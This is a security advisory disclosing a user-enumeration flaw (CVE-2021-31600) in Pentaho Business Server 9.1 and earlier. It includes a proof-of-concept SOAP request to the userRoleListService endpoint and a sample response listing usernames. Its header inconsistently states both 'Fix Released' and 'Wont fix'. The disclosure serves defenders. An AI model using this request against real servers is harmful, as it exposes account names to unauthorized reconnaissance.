Pentaho Business Analytics / Pentaho Business Server 9.1 User Enumeration

`Product: Pentaho Business Analytics / Pentaho Business Server  
Vendor / Manufacturer: Hitachi Vantara  
Affected Version(s): <= 9.1  
Vulnerability Type: Jackrabbit User Enumeration  
Solution Status: Fix Released on public GitHub repository  
Manufacturer Notification: 8th February 2021  
Solution Date: Wont fix  
Public Disclosure: 01 November 2021  
CVE Reference: CVE-2021-31600  
Author(s) of Advisory: Alberto Favero ( HawSec ) & Altion Malka  
  
--- ### --- ### ---  
  
Product Description:  
  
Pentaho is business intelligence (BI) software that provides data  
integration, OLAP services, reporting, information dashboards, data mining  
and extract, transform, load (ETL) capabilities. Its headquarters are in  
Orlando, Florida. Pentaho was acquired by Hitachi Data Systems in 2015 and  
in 2017 became part of Hitachi Vantara.  
  
( Source: https://en.wikipedia.org/wiki/Pentaho )  
  
--- ### --- ### ---  
  
Vulnerability Details:  
  
Pentaho implements a series of web services using the SOAP protocol to  
allow scripting interaction with the backend server. HAWSEC identified that  
the services userRoleListService and ServiceAction exposed through the  
"/pentaho/webservices/userRoleListService" and  
"/pentaho/ServiceAction?action=SecurityDetails" endpoints are not enforcing  
sufficient access controls. Specifically, an authenticated user can list  
all application usernames present in the Jackrabbit Repository.  
  
--- ### --- ### ---  
  
Proof of Concept (PoC):  
  
See Ginger ( https://github.com/HawSec/ginger )  
  
or  
  
--- ~~~ --- ~~~ ---  
POST /pentaho/webservices/userRoleListService HTTP/1.1  
Host: localhost:8080  
Connection: close  
Cookie: JSESSIONID=878BCFF82EC40D06F72D64172CAC98B4;  
SOAPAction:  
Content-Type: text/xml; charset=UTF-8  
Content-Length: 244  
<soapenv:Envelope  
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"  
xmlns:ws="http://ws.userrole.security.platform.pentaho.org/">  
<soapenv:Header/>  
<soapenv:Body>  
<ws:getAllUsers/>  
</soapenv:Body>  
</soapenv:Envelope>  
  
  
HTTP/1.1 200  
Content-Type: text/xml;charset=utf-8  
Connection: close  
Content-Length: 353  
<?xml version='1.0' encoding='UTF-8'?>  
<S:Envelope  
xmlns:S="http://schemas.xmlsoap.org/soap/envelope/">  
<S:Body>  
<ns2:getAllUsersResponse  
xmlns:ns2="http://ws.userrole.security.platform.pentaho.org/">  
<return>pat</return>  
<return>test</return>  
<return>suzy</return>  
<return>admin</return>  
<return>tiffany</return>  
</ns2:getAllUsersResponse>  
</S:Body>  
</S:Envelope>  
--- ~~~ --- ~~~ ---  
  
--- ### --- ### ---  
  
  
Credits:  
  
This vulnerability was discovered by Alberto Favero & Altion Malka  
  
--- ### --- ### ---  
  
  
  
  
--   
BlackHawk - [email protected]  
  
Experientia senum, agilitas iuvenum.  
Adversa fortiter. Dubia prudenter.  
  
  
`